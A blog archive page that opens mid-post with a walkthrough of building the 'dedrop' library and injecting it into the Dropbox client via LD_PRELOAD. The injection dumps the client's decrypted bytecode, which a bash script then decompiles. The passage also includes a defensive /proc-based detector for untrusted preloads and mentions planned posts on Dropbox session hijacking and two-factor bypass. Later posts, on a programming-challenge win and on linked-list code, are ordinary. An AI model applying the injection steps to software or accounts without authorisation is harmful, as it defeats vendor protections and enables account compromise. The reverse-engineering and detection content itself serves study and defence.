➜ cd dedrop/src/dedrop
➜  dedrop (master) ls
all.py  main.c  Makefile  map  _marshal.py  opcode-generator.py  payload.o  payload.py
➜  dedrop (master) make                                                                                                                
objcopy -I binary -O elf32-i386 -B i386 payload.py payload.o
gcc -Wall -ggdb -fPIC -Wno-unused-but-set-variable -m32 -c -I/usr/include/python2.7 -o main.o main.c
gcc -Wall -ggdb -fPIC -Wno-unused-but-set-variable -m32 -shared -Wl,-soname -Wl,libdedrop.so -o libdedrop.so main.o payload.o -lpthread -ldl
➜  dedrop (master)  ls                                                                                                                  
all.py  libdedrop.so  main.c  main.o  Makefile  map  _marshal.py  opcode-generator.py  payload.o  payload.py

Now the shared object is ready for use:

➜ dedrop (master) export BLOB_PATH=$HOME/.dropbox-dist/dropbox
➜ dedrop (master) LD_PRELOAD=$HOME/Dropbox/dedrop/src/dedrop/libdedrop.so ~/.dropbox-dist/dropbox

You may get an output like this:

.
.
[+] writing to /home/seshagiri/Dropbox/dedrop/src/dedrop/pyc_decrypted/xml/sax/xmlreader.pyc
[+] writing to /home/seshagiri/Dropbox/dedrop/src/dedrop/pyc_decrypted/zipfile.pyc

:) :) :) w00t!

All the decrypted bytecode has been written, in .pyc file format, into the pyc_decrypted directory.
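Seen from the defender's side, the LD_PRELOAD run above leaves two traces under /proc: the variable in the process environment and the injected library in the process memory map. The following is an added example, not code from the post or from dedrop; it flags preloads that come from outside the system library directories. The trusted directory list, the PIDs and the sample data are assumptions constructed for illustration.

```python
import posixpath

# Assumption for this example: libraries under these directories are trusted.
TRUSTED_LIB_DIRS = ("/lib/", "/lib32/", "/lib64/",
                    "/usr/lib/", "/usr/lib32/", "/usr/lib64/")


def parse_environ(blob):
    """Parse the NUL-separated bytes of /proc/<pid>/environ into a dict."""
    env = {}
    for entry in blob.split(b"\0"):
        name, sep, value = entry.partition(b"=")
        if sep:
            env[name.decode("utf-8", "replace")] = value.decode("utf-8", "replace")
    return env


def preload_entries(env):
    """The dynamic loader accepts spaces or colons between LD_PRELOAD entries."""
    return env.get("LD_PRELOAD", "").replace(":", " ").split()


def is_trusted(path):
    """Trusted only if absolute and, once '..' is resolved, in a system dir."""
    norm = posixpath.normpath(path)
    return posixpath.isabs(norm) and norm.startswith(TRUSTED_LIB_DIRS)


def mapped_files(maps_text):
    """Collect the file paths listed in the text of /proc/<pid>/maps."""
    paths = set()
    for line in maps_text.splitlines():
        fields = line.split(None, 5)
        if len(fields) == 6 and fields[5].startswith("/"):
            paths.add(fields[5])
    return paths


def audit_process(pid, environ_blob, maps_text):
    """Return one finding per untrusted LD_PRELOAD entry of a process."""
    loaded = mapped_files(maps_text)
    findings = []
    for lib in preload_entries(parse_environ(environ_blob)):
        if not is_trusted(lib):
            findings.append({"pid": pid, "library": lib,
                             "mapped": posixpath.normpath(lib) in loaded})
    return findings


# Constructed sample data: a process started the way the post starts Dropbox,
# and an ordinary process that preloads a library from a system directory.
LIB = "/home/seshagiri/Dropbox/dedrop/src/dedrop/libdedrop.so"
SAMPLE_ENVIRON = ("HOME=/home/seshagiri\0LD_PRELOAD=" + LIB +
                  "\0BLOB_PATH=/home/seshagiri/.dropbox-dist/dropbox\0").encode()
SAMPLE_MAPS = (
    "08048000-08049000 r-xp 00000000 08:01 131 /home/seshagiri/.dropbox-dist/dropbox\n"
    "f7700000-f7703000 r-xp 00000000 08:01 977 " + LIB + "\n"
    "ffd00000-ffd21000 rw-p 00000000 00:00 0 [stack]\n"
)
BENIGN_ENVIRON = b"LD_PRELOAD=/usr/lib/libexample.so\0PATH=/usr/bin\0"

if __name__ == "__main__":
    for finding in audit_process(4242, SAMPLE_ENVIRON, SAMPLE_MAPS):
        print(finding)
    print(audit_process(4243, BENIGN_ENVIRON, ""))
```

On a live system, pass in the contents of /proc/<pid>/environ (read as bytes) and /proc/<pid>/maps for each process you are permitted to read.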

Decompile the decrypted files

I have written a small shell script to decompile all the .pyc files in the pyc_decrypted directory using the uncompyle2 tool.

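#!/bin/bash
# Decompile every .pyc file below the current directory with uncompyle2
find . -name "*.pyc" | while read -r i
do
        filename=${i%%.pyc}
        echo  "Uncompiling $i"
        # head -n-3 drops the last three lines of uncompyle2's output
        uncompyle2 "$i" | head -n-3 > "$filename.py"
done

# Remove the .pyc files once they have been decompiled
find . -name "*.pyc" -exec rm {} \;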

We now have all the decompiled programs in the pyc_decrypted directory. Using these files, you can start building your own open source Dropbox client if you want.

The authors have also mentioned breaking the two-factor authentication used in Dropbox and hijacking Dropbox accounts. As I am a beginner in RE, I haven’t looked into it further. I will be updating this article later to include the session hijacking and breaking two-factor authentication of Dropbox accounts.

We have won a programming challenge


I am extremely happy to inform that we (Avani Lodhaya and I) have won the programming challenge organized by an NGO – Wise Earth Technologies. It’s only due to Amma’s grace and the guidance of Bithin Alangot that we were able to complete the challenge (of course! winning requires special bragging rights) within time even though we started working on it just 2 weeks before the deadline. We will receive a cash prize of 1000 Euros for our contribution, which I will be handing over to Bithin for his living expenses as he is moving to the USA (we worked on the project only for humanitarian purposes and boosting our resumes). We have developed Crisis Communicator, an open source disaster management communication information system. The system consists of mobile communication stations, running on cheap open source hardware (Raspberry Pi connected to a 5 inch TFT display), supported by a web application that uses the Django web framework. In order to guarantee the peaceful use of this application, while ensuring that the military can use it for rescue operations during disasters, the system is released under the Peaceful Open Source License. The expected cost of the device will be around $50 – $100 per communication station, enabling its large-scale deployment in disaster-hit areas. The Crisis Communicator allows rescue volunteers to connect to other volunteers using APRS (which has no ground infrastructure, unlike other communication means like GPRS, 3G, CDMA etc) to obtain live updates about refugees, refugee camps, resource availability, condition of the roads, missing and deceased persons. All the features of the Crisis Communicator are embedded with the offline OpenStreetMap, enabling its use on smartphones or PCs, and the response team can add situational awareness and updates by simply tapping on the phone or with simple mouse clicks. The application is capable of detecting the positions of the other volunteers using the Global Positioning System.
A complete user manual of the application can be found here. Here’s the link to the announcement of the winner in the organization’s website.

Below is a screenshot of the application

Below are the news articles published in local newspapers (Indian Express and Kerala Kaumadi):

Doubly linked list


In a doubly linked list, each node contains, besides the next-node link, a second link field pointing to the previous node in the sequence. The two links may be called next and previous.

Example

Head -> 12 <-> 15 <-> 6 <-> 11 <- Tail

Code

#!/usr/bin/python
# An implementation of doubly linked list

class ListNode:
    def __init__(self, data):
        self.data = data
        self.next = self.previous = None

class List:
    def __init__(self):
        self.head = self.tail = None

    def addFirstNode(self, newNode):
        ''' A function to add the first node to the list '''

        self.head = self.tail = newNode
        self.head.previous = self.tail.next = None

    def addNodeTail(self, data):
        ''' Function to add an element to the tail of the list '''

        newNode = ListNode(data)
        
        # Empty list
        if self.head == None:
            self.addFirstNode(newNode)

        # Non-empty list
        else:
            self.tail.next = newNode
            newNode.previous = self.tail
            self.tail = newNode

        self.tail.next = None

    def addNodeHead(self, data):
        ''' Function to add an element to the head of the list '''

        newNode = ListNode(data)
        
        # Empty list
        if self.head == None:
            self.addFirstNode(newNode)

        # Non-empty list
        else:
            self.head.previous = newNode
            newNode.next = self.head
            self.head = newNode

    def delFirstNode(self):
        ''' Function to delete the single node '''

        self.head = self.tail = None

    def delNodeTail(self):
        ''' Function to delete a node from the tail of the list '''

        node = self.tail

        # Empty list
        if self.head == None:
            print("List is empty")
            return

        # Single node list
        elif self.head == self.tail:
            self.delFirstNode()
            return

        # Multiple node list
        else:
            self.tail = node.previous
            self.tail.next = None

    def delNodeHead(self):
        ''' Function to delete a node from head '''

        node = self.head

        # Empty list
        if self.head == None:
            print("List is empty")
            return

        # Single node list
        if self.head == self.tail:
            self.delFirstNode()
            return

        # Multi-node list
        if self.head != self.tail:
            node = node.next
            node.previous = None
            self.head = node

    def delNode(self, element):
        ''' Function to delete a user specified node '''

        # Empty list
        if self.head == None:
            print("List is empty")
            return

        node = self.head
        found = False

        # Single node that does not contain the element
        if self.head == self.tail and self.head.data != element:
            print("Element not found in the list")
            return

        # Head contains element
        if self.head.data == element:
            self.delNodeHead()
            return

        # Checks for the element in the rest of the list
        while node.next != None:
            if node.next.data == element:
                found = True
                break
            else:
                node = node.next

        # If element was found
        if found:
            if node.next.next != None:
                # Unlink node.next and repair both links around it
                temp = node.next
                node.next = temp.next
                temp.next.previous = node

            else:
                self.delNodeTail()

        # If the element was not found
        else:
            print("Element was not found in the list")



def display(linked_list):
    ''' Function to display the linked list '''

    print("\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+")
    node = linked_list.head
    if node is None:
        print("Head -> None")
    else:
        # Collect the values, then join them with the two-way link marker
        items = []
        while node is not None:
            items.append("%d" % node.data)
            node = node.next
        print("Head -> " + " <-> ".join(items) + " <- Tail")
    print("+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n")


if __name__ == "__main__":
    ''' Main function '''

    # raw_input exists only on Python 2; fall back to input on Python 3
    try:
        read_line = raw_input
    except NameError:
        read_line = input

    linked_list = List()
    while True:
        print("+-+-+-+-+-+-+-+-+-Doubly Linked list+-+-+-+-+-+-+-+-+-+")
        print("+ 1. Add a node to the tail                           +")
        print("+ 2. Add a node to the head                           +")
        print("+ 3. Remove a node from tail                          +")
        print("+ 4. Remove a node from head                          +")
        print("+ 5. Remove a node                                    +")
        print("+ 6. Exit                                             +")
        print("+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+")
        try:
            s = int(read_line('Enter your Choice: '))
            if s == 1:
                inp = int(read_line('Enter the element you want to insert to the tail: '))
                linked_list.addNodeTail(inp)
                display(linked_list)

            elif s == 2:
                inp = int(read_line('Enter the element you want to insert to the head: '))
                linked_list.addNodeHead(inp)
                display(linked_list)

            elif s == 3:
                linked_list.delNodeTail()
                display(linked_list)

            elif s == 4:
                linked_list.delNodeHead()
                display(linked_list)

            elif s == 5:
                inp = int(read_line('Enter the element you want to delete from the list: '))
                linked_list.delNode(inp)
                display(linked_list)

            elif s == 6:
                break

            else:
                print("Invalid input")

        # Non-numeric input for the choice or for an element
        except ValueError:
            print("Invalid input")

Singly linked list


A linked list is a group of nodes which together represent a sequence. In this blog, I am trying to explain the singly linked list.

Singly linked lists contain nodes which have a data field as well as a next field, which points to the next node in the linked list.

Example

1 -> 5 -> 2 -> 9 -> None

Code

#!/usr/bin/python
# An implementation of linked list

class ListNode:
    def __init__(self, data):
        self.data = data
        self.next = None

class List:
    def __init__(self):
        self.head = self.tail = None

    def addFirstNode(self, newNode):
        ''' A function to add the first node to the list'''

        self.head = self.tail = newNode

    def addNodeTail(self,  data):
        ''' Function to add an element to the tail of the list '''

        newNode = ListNode(data)

        # Empty list
        if self.head == None:
            self.addFirstNode(newNode)
    
        # Non-empty list
        else:
            self.tail.next = newNode
            self.tail = newNode

        self.tail.next = None

    def addNodeHead(self, data): 
        '''Function to add an element to the head of the list '''

        newNode = ListNode(data)
        
        # Empty list
        if self.head == None:
            self.addFirstNode(newNode)
        
        # Non-empty list
        else:
            temp = self.head
            self.head = newNode
            self.head.next = temp
    

    def delFirstNode(self):
        ''' Function to delete the single node '''

        self.head = self.tail = None

    def delNodeTail(self):
        ''' Function to delete a node from the tail of the list '''

        node = self.head

        # Empty list
        if self.head == None:
            print("List is empty")
            return

        # Single node list
        elif self.head == self.tail:
            self.delFirstNode()
            return

        # Multiple node list: walk to the node just before the tail
        else:
            while node.next.next != None:
                node = node.next
            node.next = None
            self.tail = node

    def delNodeHead(self):
        ''' Function to delete a node from head '''

        node = self.head

        # Empty list
        if self.head == None:
            print("List is empty")
            return

        # Single node list
        if self.head == self.tail:
            self.delFirstNode()
            return

        # Multi-node list
        if self.head != self.tail:
            node = node.next
            self.head = node
            return


    def delNode(self, element):
        ''' Function to delete a user specified given node '''

        # Empty list
        if self.head == None:
            print("List is empty")
            return

        node = self.head
        found = False

        # If there's only one node and it doesn't contain the given element
        if self.head == self.tail and self.head.data != element:
            print("Element not found in the list")
            return

        # If the head node contains the element
        if self.head.data == element:
            self.delNodeHead()
            return

        # To check if the node is in the rest of the list
        while node.next != None:
            if node.next.data == element:
                found = True
                break

            else:
                node = node.next

        # If node was found
        if found:
            if node.next.next != None:
                node.next = node.next.next

            else:
                self.delNodeTail()

        # If the element was not found in the list
        else:
            print("Element not found in the list")
      
def display(linked_list):
    ''' Function to display the linked list '''

    print("\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+")
    node = linked_list.head
    if node is None:
        print("List is empty! Fill something in the list in-order to delete")
        print("Head -> None")
    else:
        # Collect the values, then join them with the link marker
        items = []
        while node is not None:
            items.append("%d" % node.data)
            node = node.next
        print("Head -> " + " -> ".join(items) + " <- Tail")
    print("+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n")


if __name__ == "__main__":
    ''' Main function '''

    # raw_input exists only on Python 2; fall back to input on Python 3
    try:
        read_line = raw_input
    except NameError:
        read_line = input

    linked_list = List()
    while True:
        print("+-+-+-+-+-+-+-+-+-Singly Linked list+-+-+-+-+-+-+-+-+-+")
        print("+ 1. Add a node to the tail                           +")
        print("+ 2. Add a node to the head                           +")
        print("+ 3. Remove a node from tail                          +")
        print("+ 4. Remove a node from head                          +")
        print("+ 5. Remove a node                                    +")
        print("+ 6. Exit                                             +")
        print("+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+")
        try:
            s = int(read_line('Enter your Choice: '))
            if s == 1:
                inp = int(read_line('Enter the element you want to insert to the tail: '))
                linked_list.addNodeTail(inp)
                display(linked_list)

            elif s == 2:
                inp = int(read_line('Enter the element you want to insert to the head: '))
                linked_list.addNodeHead(inp)
                display(linked_list)

            elif s == 3:
                linked_list.delNodeTail()
                display(linked_list)

            elif s == 4:
                linked_list.delNodeHead()
                display(linked_list)

            elif s == 5:
                inp = int(read_line('Enter the element you want to delete from the list: '))
                linked_list.delNode(inp)
                display(linked_list)

            elif s == 6:
                break

            else:
                print("Invalid input")

        # Non-numeric input for the choice or for an element
        except ValueError:
            print("Invalid input")